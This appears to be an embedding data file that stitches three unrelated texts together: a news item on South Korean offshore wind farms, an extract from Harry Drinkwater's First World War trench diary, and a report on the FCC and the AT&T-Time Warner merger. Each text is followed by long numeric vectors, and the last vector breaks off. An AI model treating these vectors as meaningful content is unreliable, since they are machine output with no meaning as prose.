If there's one thing that South-Korea has a lot of, it's coastlines. Offshore wind power is a great fit for the country, which is probably why the government and private companies have decided to invest 9.2 trillion won ($8.2 billion) in offshore wind farms. A 100 MW pilot wind farm is scheduled to come online by 2013, to be followed by a 900 MW one by 2016, and then an additional 1,500 MW of further capacity by 2019, for a total of 2,500 MW and 500 turbines (huge 5 MW ones!). The new wind farms will be located on the country's West coast. "The nation joins China, Denmark, the U.S. and other countries in developing offshore wind farms. Global offshore wind power capacity totals 2.9 gigawatts, with 2.6 gigawatts under construction and about 154 gigawatts planned or proposed, according to the ministry." (source) Via Bloomberg, Techcrunch More on Alternative Energy Stirling Engine Made with Soda Cans Spins to 860 RPM (Video) Algenol's Algae-to-Ethanol Delivers 67% to 87% Reduction in CO2 Dr. Steven Chu Answers Questions from Citizens About Energy Conservation (Video) Should Energy Conservation be Framed in Terms of What Would be Lost? 2009 Snapshot of U.S. Energy Use by Lawrence Livermore National Laboratory
[ 0.013282880187034607, 0.0353010930120945, 0.02255553938448429, 0.013468416407704353, 0.07223203033208847, -0.058683015406131744, -0.08272326737642288, 0.01854543201625347, -0.047682810574769974, -0.029436931014060974, -0.007258013356477022, -0.0147628765553236, -0.01466116402298212, -0.057560138404369354, 0.025263391435146332, 0.09703534096479416, -0.01958186738193035, -0.09541033953428268, -0.05561375990509987, -0.01963898167014122, 0.06366925686597824, 0.0018062497256323695, 0.029966074973344803, -0.09363426268100739, 0.07949350774288177, 0.007345120422542095, -0.07355065643787384, 0.00940885953605175, -0.010966552421450615, 0.06581655889749527, -0.03997395560145378, 0.07493093609809875, -0.03522830456495285, 0.029163731262087822, 0.06178560107946396, 0.07050839811563492, -0.024186167865991592, 0.04989216476678848, 0.004927071277052164, 0.036151811480522156, 0.011106283403933048, -0.01954757422208786, 0.08338326215744019, -0.04797200486063957, 0.00003771459523704834, 0.018495429307222366, 0.03371618688106537, -0.009999671950936317, -0.015371228568255901, -0.01401203591376543, 0.01885400153696537, -0.050029657781124115, -0.017166556790471077, -0.025743423029780388, -0.02269781567156315, -0.031299591064453125, 0.004170653410255909, 0.012046921998262405, -0.005278054159134626, 0.06942897289991379, 0.04203254356980324, -0.08789467811584473, -0.04714817926287651, -0.037358563393354416, 0.0411393828690052, 0.027727801352739334, 0.015962060540914536, 0.019901549443602562, -0.05693734809756279, -0.04398096352815628, 0.03645159304141998, -0.09691355377435684, -0.0066884891130030155, 0.03948159143328667, -0.07986830174922943, 0.006309400778263807, 0.10973535478115082, 0.010949209332466125, 0.10436739027500153, -0.05640088766813278, 0.042831458151340485, 0.019766444340348244, -0.015566335991024971, -0.09542308747768402, -0.010946383699774742, -0.014014636166393757, -0.026077812537550926, 0.04861387610435486, 0.020784547552466393, 0.048780180513858795, -0.042797960340976715, -0.040075767785310745, 0.02286459133028984, 0.052173834294080734, 0.04295273870229721, 0.1404026746749878, -0.04259485751390457, 0.017357584089040756, -0.06952790170907974, -0.034520070999860764, 0.06352149695158005, 0.11126499623060226, 0.078969307243824, -0.12208937853574753, -0.0614737868309021, 0.02769273705780506, -0.020793752744793892, 0.044303055852651596, 0.06300380080938339, -0.03700026497244835, -0.05333856865763664, 0.0760241374373436, -0.04493407905101776, -0.009622765704989433, 0.017050115391612053, -0.055967431515455246, 0.06785349547863007, -0.08519063889980316, -0.008769693784415722, 0.07640386372804642, 0.052778344601392746, -0.04978279769420624, -0.01072676945477724, -0.05617113411426544, 0.05571403354406357, 0.00029001376242376864, -0.05461272597312927, 1.0203187191026797e-33, -0.015376508235931396, 0.052736230194568634, 0.04388860985636711, -0.004440782591700554, -0.018093768507242203, 0.06762751191854477, 0.014097196981310844, -0.04588226601481438, -0.027243953198194504, 0.049037229269742966, -0.07245887070894241, 0.0422484427690506, -0.03266521170735359, 0.062931127846241, 0.048675935715436935, -0.1511206030845642, 0.056771181523799896, -0.09913374483585358, 0.009216118603944778, 0.03852466493844986, 0.038684744387865067, -0.030476750805974007, -0.01589411497116089, 0.003360527800396085, 0.034455556422472, -0.08973608911037445, 0.10990527272224426, -0.06060661002993584, 0.02919420227408409, 0.05457653850317001, -0.006740021985024214, -0.018561994656920433, -0.022939620539546013, -0.06228796765208244, -0.05849974602460861, -0.02595117688179016, -0.020826978608965874, -0.011405226774513721, -0.016726624220609665, 0.029919292777776718, -0.01588403806090355, 0.04843609035015106, -0.10777856409549713, 0.06020159646868706, -0.017514115199446678, -0.006562971975654364, -0.04625241458415985, 0.00029353887657634914, -0.005633245687931776, -0.025926200672984123, -0.029335424304008484, 0.02689424902200699, -0.05344461277127266, 0.014023386873304844, 0.08514131605625153, 0.03752271085977554, 0.036589208990335464, -0.029748285189270973, 0.022820737212896347, 0.028504569083452225, -0.07944321632385254, -0.0028581053484231234, -0.05178797245025635, 0.0675855353474617, 0.043908584862947464, 0.020059220492839813, 0.07200771570205688, 0.007760973647236824, -0.12376442551612854, -0.002059187041595578, 0.015241638757288456, -0.1301184445619583, 0.03415187448263168, 0.011208231560885906, -0.0025542424991726875, -0.03229188174009323, -0.004079627804458141, 0.04684510454535484, -0.02722799964249134, 0.10679773986339569, -0.028723113238811493, 0.08802711218595505, -0.004590222146362066, -0.04934874549508095, 0.017690973356366158, -0.09925804287195206, -0.07396357506513596, 0.00465751625597477, 0.0058590141125023365, -0.03795439004898071, 0.0019783731549978256, -0.011901714839041233, 0.12058097124099731, -0.02882305532693863, -0.04535140097141266, -2.6895266665775782e-33, -0.02240021526813507, 0.043567903339862823, -0.031129073351621628, -0.03809602931141853, 0.010069851763546467, 0.03856338933110237, 0.12289717048406601, 0.02253391407430172, -0.07488203048706055, -0.07037639617919922, -0.0316038653254509, -0.01682194508612156, 0.05796356499195099, 0.04146634042263031, 0.016520533710718155, -0.04106879606842995, -0.008271530270576477, 0.04968048259615898, 0.02392069436609745, -0.05308065563440323, 0.11339306086301804, 0.012380356900393963, 0.06836577504873276, 0.1274382770061493, -0.013532827608287334, 0.010132914409041405, -0.07586327940225601, 0.024248909205198288, 0.025082537904381752, -0.006726368330419064, 0.023407667875289917, 0.04703575745224953, 0.017473803833127022, 0.06626053899526596, -0.05189596489071846, -0.009629338048398495, 0.0030568966176360846, -0.05424325540661812, -0.02836206927895546, -0.007321898825466633, 0.053040798753499985, -0.07595570385456085, -0.030383672565221786, -0.05653497949242592, -0.05946741998195648, 0.003589709522202611, -0.00898701325058937, -0.06985791772603989, 0.07273782789707184, -0.07423172891139984, 0.030111948028206825, 0.030326949432492256, -0.082835853099823, 0.0006559781613759696, 0.009043443016707897, -0.04490698128938675, 0.04798392951488495, 0.021694926545023918, -0.03944171220064163, -0.049217745661735535, -0.009499773383140564, -0.005421695299446583, 0.024741871282458305, 0.058098435401916504, -0.025937531143426895, 0.0067656999453902245, 0.09967730194330215, -0.0018041478469967842, 0.04509229585528374, -0.03482680395245552, -0.07663402706384659, 0.050572458654642105, -0.04657362028956413, 0.010231146588921547, -0.05903162807226181, 0.11796042323112488, 0.01995263621211052, -0.02570849098265171, -0.009580699726939201, -0.025529684498906136, -0.0015506024938076735, 0.06026702746748924, 0.03129670396447182, -0.07371476292610168, 0.03590312972664833, -0.09986381977796555, 0.024750255048274994, -0.08324440568685532, 0.01567324437201023, 0.016318965703248978, -0.09669660031795502, -0.05956321209669113, -0.10323964059352875, 0.039907436817884445, -0.008148899301886559, -5.065157537842424e-8, 0.010796000249683857, 0.022942638024687767, 0.09754689782857895, -0.022646937519311905, -0.023996645584702492, -0.018544988706707954, -0.025379210710525513, 0.019943006336688995, 0.024051103740930557, -0.011011066846549511, 0.06858237087726593, 0.02163858152925968, 0.05199015513062477, -0.03553864732384682, -0.02695528231561184, -0.0463239848613739, -0.02746415138244629, 0.07396110892295837, 0.04190004989504814, -0.0008038462838158011, 0.05141338333487511, 0.04041026532649994, -0.05651119351387024, -0.0006573755526915193, 0.054242633283138275, 0.034072812646627426, -0.07069277763366699, 0.06107197701931, 0.04365899786353111, 0.014361592940986156, 0.013868617825210094, -0.029720213264226913, 0.012740684673190117, 0.015079236589372158, -0.05013537406921387, -0.07527361810207367, -0.12058253586292267, -0.03793256729841232, -0.022989410907030106, 0.01317146047949791, -0.00023338504252023995, 0.0036130165681242943, 0.03577122092247009, 0.0048911720514297485, -0.05466337874531746, -0.05710839852690697, -0.03300688415765762, -0.02493775077164173, 0.01890847273170948, 0.033497780561447144, 0.026225192472338676, 0.00008059588435571641, 0.02627933956682682, -0.0014567349571734667, 0.03876039385795593, 0.1252785325050354, -0.053862132132053375, -0.05487925559282303, -0.07104308903217316, -0.029309535399079323, -0.05863230675458908, -0.08699735254049301, -0.05816786363720894, 0.07410461455583572 ]
Diary of the damned: Never seen before, a lost diary of the Great War so brutally vivid you'll feel YOU are there in the trenches Harry Drinkwater joined a 'Pals Battalion' when the war began in 1914 He was sent to the front lines and suffered the grueling realities of war His diary entries, never before published, tell of his hellish existence caked in mud, deprived of sleep and endlessly confronted by the deaths of his friends Volunteer: Harry Drinkwater, pictured, recorded the horrors of the First World War in vivid diary entries After volunteering as an Army private following the outbreak of World War I in 1914, former grammar-school boy Harry Drinkwater, 25, joined a ‘Pals battalion’ — so-called because the men were encouraged to join up with local friends and work colleagues. A few months later, his conversion from Stratford-upon-Avon shop assistant to soldier was complete. In this extract from his remarkable diary - which it was strictly against the rules to keep and which has been published for the first time - Harry writes about his brutal introduction to the trenches at the Somme in Picardie, Northern France... Thursday, December 16, 1915 Arrived in [the hamlet of] Suzanne today, after a very hard march. We’re billeted in tents, 12 men in each, encamped between the enemy and our own heavy guns. At night-time, one sees little slits of light shining from the tents on the puddles of water outside, which give the impression of a fairy land. Rolling into our blankets, we occasionally hear the ‘splash, splash’ as some fellow moves from one tent to another, or the plod of the sentry. Plus the continual shriek of shells. Tomorrow we go into the trenches. I wonder what sort of a show we will make. Sunday, December 19 No words can adequately describe the conditions. It’s not the Germans we’re fighting, but the weather. Within an hour of moving off, we were up to our knees in mud and water. The mud gradually got deeper as we advanced along the trench. We hadn’t gone far before we had to duck; the enemy were sending over their evening salute of shells. Pals battalion: Harry (centre left, marked in blue ink) joined the Second Birmingham Battalion alongside friends from home. Most of them died by the end of the war To move forward, I had to use both elbows for leverage, one each side of the trench. After about one and a half hours of this, we reached the firing line. Later, I groped my way to our dugout. What a sight. Imagine a room underneath the ground, whose walls are slimy with moisture. The floor is a foot or more deep in rancid-smelling mud. Monday, December 20 The trenches are in a terrible condition — anything up to 4ft deep in mud and water. We’re plastered in mud up to our faces. Our food - cold bacon, bread and jam - is slung together in a sack that hangs from the dripping dugout roof. Consequently, we eat and drink mud. Tuesday, December 21 Heavy bombardment at about 11am. Heard a fearful crash. The next dugout to ours blown to blazes, and our physical drill instructor Sergeant Horton with it. I helped dig him out. But before we could get him anywhere, he’d departed this life - our first experience of death. I’m tired out, sick of everything. Saturday, December 25 After five days in the trenches, we’re thankful we can still walk. I’ve had approximately an hour’s sleep a day - always standing up. Often, when from sheer exhaustion I doze off, I’m awakened by a fat squeaking rat on my shoulder or feel it running over my head. Most of the rations fail to arrive - because the communication trenches are water-logged and being continually shelled. We eat with hands caked in mud, which has caused many cases of acute dysentery. Deluged: Three members of Harry's company can be seen here posing in a trench flooded with mud almost to waist height In common with others, I’ve done regular turns at the firing line. It’s a very creepy business looking over the top, imagining every noise is a German. A rat skirmishing among empty tins in no-man’s land is sufficient to attract all our attention. Each morning, one hour before daybreak, every man stands in the trench until daylight. This is in case the Germans follow the old custom of attacking just before dawn. The same happens an hour before sunset. Last night, I had a narrow squeak. I was wedged in the mud when I heard a shell coming. Unable to move quickly, I crouched when it burst on the parapet and got covered in dirt. Later, we marched to our billets [for rest days]. This morning, Christmas Day, I took my shirt off - thick with dried mud - and had a wash. We had one tub and no soap between about 50 fellows. Friday, December 31 Back on the firing line, and nearly up to our waists in mud. We’ve found a new diversion — at dusk, we put a small piece of cheese on the end of a bayonet, wait for a rat to have a nibble, and then pull the trigger. Saturday, January 8, 1916 Raffle prize: Harry won this German scabbard in a raffle and sent it home At about 3.30am, I heard noises that sounded like wires scraping together. Half an hour later, a sentry spotted two men rising from the ground about 30 yards in front of our trench. We all opened rapid fire. At daybreak, we saw the result: a dead German lay about 20 yards in front. Scattered around were about a dozen hand-grenades. Given another five minutes, our trench would have been blown to bits. The victim had got partly through our barbed wire — which is probably what I heard. Later, we raffled his bayonet scabbard. I was the winner and sent it home as a souvenir. Harry’s next posting was to the front line near Arras in the region of Artois. Saturday, March 4 Nothing here but trench after trench and, in places, the ground blown into heaps of dirt. The trees have been hacked to pieces — only black stumps remain. Nothing grows. Utter desolation. Tuesday, March 7 Worked at a feverish pace, digging and strengthening trenches all through last night. Then through the day, I have to do an hour’s sentry duty every third hour. This is followed by an hour as the relief man, when I’m able to sit down. For the third hour, I can sleep. I’m feeling like most of the other fellows - half dead. Wednesday, March 8 Snowed all night. Had a hard job to keep awake. One or two fellows - of whom I was one - were found to be fast asleep at the end of their sentry. We’d gone to sleep standing up - and the relief man was also asleep. Under military law, this is a crime of the first water [punishable by execution]. So, as a preventative, we’ve arranged between ourselves that each sentry along the trench will fire his rifle at intervals. At dusk, I put my head over the top to have a look around and stopped a bullet on the side of my steel hat. The vibration made my head ache. Thursday, March 9 Owing to food transports going astray, we have one loaf between five of us, a few biscuits and half a tin of marmalade each per day. Have just heard we have a ten-mile march before we can be billeted [for rest]. Jolly hard lines. Rest: This annotated photograph shows the 'billets' where Harry and his comrades were taken for rest Friday, March 10 It was snowing as we set out at 11.15 last night. I saw two fellows - fast asleep as they walked along - walk out of the ranks and fall into the ditch at the side of the road. We halted for ten minutes’ rest and I dropped down into a puddle and went to sleep. Was unable to get up without help, and ended up hanging on to Lieutenant Davis on one side and a stretcher-bearer the other. Tried to pull myself together and went headlong on the road. They got me to my feet again but I was helpless. Have a vague idea that I was laid on some straw. Then oblivion. Casualty: Harry's diary described bringing wounded men back from the frontlines. The men pictured were fighting in the Battle of the Somme, where Harry also fought Sunday, April 23 Easter Sunday. A beautifully sunny [rest] day. I’m writing in a field beside a brook — I can easily imagine myself back in England. We’re all struck with the strangeness of things; one week in Hell and the next in comparative bliss. Harry was also helping to dig deep shafts that branched out towards the enemy lines. The idea was to lay explosive charges beneath German trenches - but as the Germans were doing likewise, the mining teams often tried to blow each other up halfway across. Sunday, May 7 Working in the mines - an awful strain mentally. We’re some three-parts of a mile under the ground. Air is got down by means of a large pair of blacksmith’s bellows, connected to a long pipe. But it’s very stuffy, and we work with backs bent for eight hours. Monday, May 8 Mines again. Feeling very fed up. No one jokes: we all have it in the back of our minds that the Germans’ mines will go up while we’re down one of ours - and it’s not a pleasant reflection. Friday, May 19 The Germans forestalled us this morning by about three hours. After three months of hard work, our K14 mine, timed to go up at 8am, was blown in by the Germans at 4.30am. There was a terrific explosion. The ground for yards around was lifted skywards, leaving a huge crater in the ground. Hellish fields: An aerial photograph of the trenches where Harry served Captain Edwards, our company captain, crept out over my parapet to investigate the damage and was met by a fusillade of bullets. He stopped one through the shoulder and one in the head. The moment after he was hit, an engineer sprang on to the parapet and, crawling on his stomach, dragged him back. It’s worth noting that the German sentry who shot Edwards could also have shot his rescuer. If he refrained from humane motives, he was a sportsman. Saturday, May 20 One of our fellows put his head and shoulders over the top and was immediately sniped through the head. Sunday, May 21 After sentry duty, we passed Major Jones, second-in-command of the battalion, as we crept back to the dugout. Ten minutes later, he was being dug out of about 3ft of earth. He’d gone out to the mine crater after passing us. Death was instant. We’d barely arrived at our dugout when a runner came along and gave the gas alarm. At the same time, shells were raining down. Brothers: William Hundy (far left) was killed by German fire, and was so badly disfigured that his own brother, Herbert Hundy (second left, standing with a pipe), did not realise who he was. Harry is second from the right in this photograph I helped to carry an NCO to the dressing station. His features were blown away but I recognised him by his identity disk as one of my pals. He was one of two brothers. The other, a stretcher-bearer unconscious of his identity, was the one who dug him out. Arrived back at the dugout feeling very sick. Monday May 22 At 11pm, our fellows, not sure of their ground in the dark, started slinging bombs in among themselves. Quite a usual occurrence. Wednesday, May 24 Today, D Company, on our left, went over the top. They’d got about 100 yards when they were met by a cross-fire of machine guns and rifle fire. But they still advanced. Some got to the German lines and were killed on the parapet; some got entangled in the barbed wire and riddled with bullets. Casualties: 33. Orders were now given to erect barbed wire defences in the crater left by the exploded mine. Tuesday, May 30 At 3am, we crawled into the crater and carried on wiring - just 15 yards from the German listening post. This crater alone has cost us 20 casualties so far. Wednesday, May 31 Six of us relieved the sentries in the crater. It was an uncanny night: raw, cold and a thick mist. We lay on the inside lip and hardly moved. At the first twinge of dawn, one of the fellows peeped over the top and saw four Germans digging like blazes within 12 yards of where we were lying. Diaries: Harry's remarkable diary is being published for the first time, 35 years after he died For some reason, we’d been told that under no circumstances were we to fire; so we withdrew. It’s never been very clear to me why we should risk so much life just to put barbed wire entanglements in the bottom of a crater. Today, it’s been strafed all day long. The Germans are very restless over this crater. They can’t quite make out what we’re doing with it and what we want it for. Thursday, June 1 The crater has been completely transformed. We’ve now built a little shack on the near side, protected by sandbags. Tuesday, June 6 At 4pm on Sunday, a shell landed in front of me and another behind, blowing in the rear of the trench and smothering me with dirt. Casualties were occurring rapidly. I’d barely bandaged Jones, who was badly hit, when Eastwood came rushing in to say the shelter in the crater had been blown in and the sentry group buried. A day sooner, and I’d have been one of them. Jinks and I gathered picks and shovels and made for the crater. We’d crawled about 15 yards when a shell landed immediately on top of the trench, partly burying us with earth. I felt the force of the explosion force my head into my body and it was some seconds before I was able to see. By this time, it was impossible to go on. The ground vibrated with explosions and the air was thick with sulphurous fumes. Buried alive: Sergeant Ashby (pictured far left before leaving to fight) was buried in the mine crater mentioned in Harry's 6 June entry I didn’t for a moment think we’d get out of this alive. But, after three hours, everything ceased as suddenly as it started. Later, I found an unexploded shell within a couple of feet of where Jinks and I had been lying. The gods had been good. We made our way back to the front line, dazed. It was unrecognisable: a series of holes, no real trench remaining. Some fellows were lying about dead, some wounded and some alive - one of whom inquired about the fellows in the crater. Then I remembered why I’d left the line. Gathering up what picks we could find, a sergeant and I crawled back over the top and into the crater. A wretched sight. Young Cooper was wedged in the doorway dead, the remainder buried under the shack. We dug like fury for two hours, impelled by the fact that we could hear someone faintly groaning - and that at any moment, the Germans would be coming over. Only Sergeant Ashby had some signs of life. Leaving those we couldn’t help, we carried him down to what remained of the front line. At 9.30pm, Raper and Middleton - close friends - went down, killed by a rifle grenade. Then Jinks was hit by another as we lay next to each other. His legs had been blown off and he was going fast. I could do little else than kneel by his side. He asked me not to leave him and recognised me almost to the last moment. I saw him go West. It was quickly over. Harry Drinkwater, 25, joined a ‘Pals battalion’ — so-called because the men were encouraged to join up with local friends and work colleagues Meanwhile, the Germans were coming in. Only a few got out of our trench again; the rest of the Germans were either bayoneted or bombed, and we buried them later. Wednesday, June 7 Total battalion casualties for Sunday: 120. The roll-call this morning was somewhat pathetic. Each time a name was called out and no one answered, we had to say if we’d seen the fellow killed or knew if he was wounded. There are now very few of the original men I joined with. The idea under which the battalion was formed, that of friends serving together, has long since passed. Thursday, June 15 This afternoon we lost four more. But we’re quite resigned nowadays to losing old originals. It seems as if the fates have decreed that they’ve had a good run and it’s time they went. Kilby asks: ‘Whose turn next?’ We all wonder... Kilby is last mentioned in a diary entry dated January 23, 1917. He and Harry are at a rest camp in Boulogne and Harry is leaving for Blighty. By the end of the war, Harry had served on the Somme, at Ypres and in Italy and had received the Military Cross for bravery. After being demobbed, he worked as a civil servant. He never married and died in 1978.
[ -0.03672265633940697, -0.0004835495783481747, 0.0013871716801077127, 0.00537482276558876, 0.03551249951124191, 0.030717935413122177, 0.028023457154631615, -0.06856250762939453, -0.04367855191230774, -0.06534157693386078, -0.018413186073303223, 0.03516208752989769, -0.005688359495252371, 0.09264229238033295, -0.025375740602612495, 0.011758442036807537, -0.060592640191316605, -0.04297846183180809, -0.03121691383421421, -0.001402229187078774, -0.034134913235902786, -0.003037465736269951, 0.1282140165567398, -0.0502777136862278, 0.04339543730020523, 0.03341258689761162, 0.0002878537925425917, 0.011992225423455238, -0.06347844749689102, 0.03976566344499588, -0.05182843282818794, 0.016788220033049583, -0.04409365728497505, -0.0993313416838646, 0.07308197021484375, 0.030740348622202873, 0.1508769541978836, 0.05415496975183487, 0.07092143595218658, -0.0823480561375618, -0.06630314141511917, -0.047131020575761795, 0.04469230771064758, 0.05230579525232315, -0.04990192502737045, 0.03691048175096512, -0.004676224198192358, -0.0028381701558828354, -0.04411432892084122, 0.04238284006714821, 0.005378847476094961, 0.013819679617881775, 0.06902371346950531, -0.03719869628548622, 0.024985847994685173, -0.016952261328697205, 0.0037901338655501604, 0.08103320002555847, -0.041681233793497086, -0.016626203432679176, -0.10167163610458374, -0.02213151752948761, -0.029340842738747597, 0.025005102157592773, -0.03892597183585167, -0.01863526739180088, -0.016124729067087173, 0.0848924070596695, 0.02895863726735115, 0.02885235659778118, -0.050711024552583694, 0.061818383634090424, 0.04066899046301842, -0.07472562044858932, -0.06381764262914658, 0.009139865636825562, 0.023012923076748848, 0.05068567395210266, 0.03581325709819794, -0.0017147863982245326, 0.0349218025803566, 0.10531260818243027, 0.1512337177991867, 0.0385797880589962, -0.033172935247421265, -0.06546144187450409, 0.02169593796133995, -0.07824314385652542, -0.0007450432749465108, 0.039312683045864105, -0.030373547226190567, -0.06202295422554016, 0.01927361451089382, 0.048723254352808, 0.060257766395807266, -0.01375963818281889, 0.03874564543366432, 0.11564289778470993, -0.03694932535290718, 0.03749311342835426, 0.03321058675646782, 0.03748644143342972, 0.00258794822730124, 0.02905462123453617, 0.06804266571998596, -0.03303397074341774, -0.03096841461956501, 0.003962759859859943, 0.0299169160425663, -0.013187291100621223, -0.024849260225892067, 0.07863130420446396, -0.034200556576251984, -0.055468861013650894, 0.016343239694833755, -0.010837430134415627, 0.0027220819611102343, -0.041727542877197266, -0.03878206014633179, 0.1395915448665619, -0.015471461229026318, 0.06010664254426956, -0.00339123560115695, 0.11361504346132278, -0.06401346623897552, 0.08769133687019348, 0.09175443649291992, 1.0695467694761863e-33, 0.0920182392001152, -0.05822966620326042, -0.07838783413171768, 0.06952814757823944, 0.07431711256504059, 0.009406576864421368, -0.036698117852211, 0.043028008192777634, 0.013016750104725361, -0.06620107591152191, -0.031465571373701096, -0.020779365673661232, 0.000840845750644803, -0.011975361034274101, -0.07961413264274597, -0.03810644894838333, -0.028049491345882416, 0.02426891401410103, 0.01882283203303814, -0.07053027302026749, 0.004220183007419109, -0.038174185901880264, 0.022099465131759644, -0.01386320497840643, -0.03358801454305649, 0.04293563961982727, -0.003900940530002117, 0.06155795976519585, 0.0031177711207419634, 0.034695159643888474, -0.018593624234199524, -0.0118324039503932, -0.001621066709049046, -0.05425218120217323, -0.059160903096199036, -0.0044722300954163074, 0.06281454116106033, -0.07544125616550446, 0.02488906867802143, -0.10812543332576752, 0.012957720085978508, 0.032416652888059616, -0.010779423639178276, -0.08244966715574265, -0.005843698512762785, 0.00005479173705680296, -0.06374374777078629, 0.011949700303375721, -0.029965389519929886, -0.0013245389563962817, -0.03648873046040535, 0.015188251622021198, -0.08640971034765244, 0.031148500740528107, -0.08999254554510117, -0.011234648525714874, 0.0448320247232914, -0.019121414050459862, 0.0005358451162464917, -0.04681393504142761, 0.045909471809864044, 0.05223887413740158, 0.020088158547878265, 0.03609664738178253, -0.08274274319410324, -0.03143779933452606, -0.05849737301468849, -0.02682132087647915, 0.013345749117434025, -0.10716445744037628, -0.08499789983034134, 0.008726485073566437, -0.03679567575454712, -0.11181578040122986, 0.010157205164432526, 0.026971202343702316, 0.09326989203691483, 0.0271509550511837, -0.04709508642554283, 0.0024946886114776134, 0.03505057096481323, 0.052817635238170624, -0.08144351094961166, -0.005428739357739687, -0.04969509690999985, -0.07422787696123123, 0.012549360282719135, -0.10257325321435928, -0.04478643462061882, 0.031674329191446304, -0.049296487122774124, 0.021945614367723465, 0.002951538423076272, -0.0793202817440033, -0.011586264707148075, -5.0886731677234346e-33, 0.06760691851377487, 0.01047605462372303, 0.029737701639533043, -0.09902481734752655, -0.02862389199435711, -0.03775063157081604, -0.000017493270206614397, 0.04344954341650009, 0.07465511560440063, 0.03337465599179268, -0.043872833251953125, 0.0021711017470806837, 0.0023085838183760643, 0.031452108174562454, -0.05574151873588562, 0.017244260758161545, -0.038005582988262177, -0.008407899178564548, 0.03489784523844719, 0.04039293900132179, 0.07025018334388733, 0.0305072870105505, -0.03340744599699974, -0.012738688848912716, 0.03907069191336632, -0.005442458670586348, 0.05570968613028526, -0.0374874472618103, -0.050370700657367706, -0.014276986010372639, 0.0851968452334404, 0.021769527345895767, 0.000782811432145536, -0.007630069740116596, 0.024740096181631088, -0.04091160371899605, -0.016729235649108887, -0.00937191303819418, -0.0906146764755249, 0.0006110352696850896, 0.07176801562309265, 0.017673522233963013, -0.11480532586574554, -0.03088131919503212, 0.029259059578180313, 0.013071700930595398, -0.0550948828458786, -0.05388697236776352, 0.030432695522904396, 0.04484907165169716, -0.039150916039943695, 0.018182994797825813, -0.02559848502278328, -0.00770733505487442, 0.011759820394217968, -0.06509044021368027, -0.0354420468211174, -0.06368708610534668, -0.09739671647548676, 0.01497536338865757, -0.06089761480689049, 0.044065654277801514, -0.04380769282579422, 0.023510631173849106, 0.054976943880319595, -0.10334523022174835, -0.07837622612714767, 0.06439075618982315, -0.01060816366225481, 0.026806265115737915, -0.02663378044962883, -0.028557559475302696, 0.04615308716893196, 0.017247507348656654, 0.04997264966368675, -0.00878545455634594, -0.05366562679409981, -0.07266215980052948, -0.1270308643579483, -0.015219714492559433, -0.020194925367832184, 0.04073358327150345, 0.010249467566609383, 0.0069472757168114185, 0.009440707974135876, -0.06262672692537308, 0.11576167494058609, 0.03727297857403755, -0.0165113415569067, 0.0027844440191984177, 0.048714298754930496, -0.050909414887428284, -0.05913222208619118, -0.0015222219517454505, -0.008695566095411777, -6.116727035987424e-8, -0.0738496407866478, 0.028968803584575653, 0.04068182036280632, 0.1518208384513855, -0.040745776146650314, -0.06171325966715813, 0.010226628743112087, 0.00986439362168312, 0.0027822016272693872, 0.03841664642095566, 0.0063123758882284164, 0.08730821311473846, -0.08421972393989563, -0.09705109894275665, -0.016643764451146126, -0.08430013805627823, -0.02395867370069027, -0.13822777569293976, -0.03361104801297188, 0.03712651506066322, 0.018678244203329086, -0.01698405295610428, 0.021732522174715996, 0.0015560720348730683, 0.029412616044282913, 0.04079195111989975, -0.0007255445816554129, -0.06094897538423538, 0.0040791514329612255, -0.02775072678923607, 0.04073912650346756, 0.09068232774734497, 0.04597945883870125, 0.013008968904614449, -0.0821349248290062, -0.02378734201192856, -0.006296835374087095, 0.011034038849174976, -0.04127780348062515, 0.01663912460207939, 0.018710242584347725, -0.07213281095027924, 0.07732972502708435, -0.004480401985347271, 0.06093430891633034, 0.05903662368655205, -0.011856232769787312, 0.010984051041305065, 0.040448155254125595, -0.004980945959687233, -0.062070026993751526, 0.0874762237071991, 0.07287706434726715, 0.10436537861824036, 0.00462003517895937, -0.000018149157767766155, -0.029152367264032364, 0.08384985476732254, 0.031563855707645416, -0.03744559735059738, 0.04055209830403328, 0.057661980390548706, -0.05245162546634674, -0.016404232010245323 ]
Federal Communications Commission Chairman Ajit Pai said on Monday that he does not expect the AT&T-Time Warner deal to be subject to his agency’s approval. Speaking to the Wall Street Journal at the Mobile World Congress in Barcelona, Spain, Pai said that AT&T's purchase of Time Warner has been structured in a way that would allow it to avoid FCC scrutiny by not transferring any airwave licenses between the two companies. “That is the regulatory hook for FCC review,” Pai said. “My understanding is that the deal won’t be presented to the commission.” ADVERTISEMENT In an SEC filing last month, Time Warner revealed that it would not be transferring any of its FCC licenses to AT&T as part of the $85 billion merger. FCC Commissioner Mignon Clyburn, the lone Democrat on the panel, has called for the deal to be scrutinized by the FCC. "To put things in perspective, this transaction is worth $16 billion more than the Comcast/NBC-U and the subsequently abandoned AT&T/T-Mobile deals combined," Clyburn said in a statement. "This Commission has both the authority and responsibility to thoroughly examine this transaction and we should not shrink from our responsibilities under the laws we are responsible for implementing”. The deal will still have to be cleared by the Justice Department. President Trump came out against the deal when it was first announced while he was on the campaign trail last year, but he's since indicated that he is open to changing his position. "I have been on the record in the past of saying it's too big and we have to keep competition,” he told Axios last month. “So, but other than that, I haven't, you know, I haven't seen any of the facts, yet. I'm sure that will be presented to me and to the people within government."
[ -0.04618615284562111, 0.01941857300698757, -0.02419007569551468, -0.022756576538085938, 0.0088518550619483, 0.012210957705974579, 0.08628470450639725, -0.026745812967419624, 0.04319627955555916, -0.0700484961271286, 0.015950461849570274, 0.05729890987277031, -0.02440289407968521, 0.01068124920129776, 0.02070626989006996, -0.016340136528015137, 0.037654243409633636, -0.09542066603899002, 0.006709615234285593, 0.017979629337787628, -0.014782123267650604, 0.008026039227843285, -0.015759127214550972, -0.03210025653243065, 0.03205416351556778, -0.051658228039741516, -0.1313234567642212, -0.036428406834602356, -0.03739210590720177, -0.02508106268942356, -0.04151371121406555, 0.01270982250571251, -0.008929957635700703, -0.011862391605973244, -0.011665375903248787, -0.03057810105383396, -0.0311720110476017, 0.05623933672904968, 0.09343130886554718, 0.004139757249504328, 0.11619303375482559, -0.043516725301742554, -0.15453919768333435, 0.06288789957761765, -0.02887710928916931, -0.01905202306807041, 0.08744765818119049, 0.004910830408334732, -0.06760504841804504, 0.055000800639390945, 0.02341446280479431, 0.038563769310712814, 0.01900016888976097, -0.060797397047281265, -0.03378557041287422, 0.04369889944791794, 0.011019144207239151, 0.07219165563583374, 0.045852381736040115, 0.06634441018104553, 0.023564644157886505, -0.005846809130162001, -0.0428863987326622, 0.09581633657217026, 0.07027547806501389, -0.01574358344078064, -0.03838947415351868, -0.0056817797012627125, -0.07619789987802505, -0.08830785751342773, 0.04877536743879318, 0.00218805274926126, -0.02061697468161583, 0.05329141765832901, 0.06089005991816521, 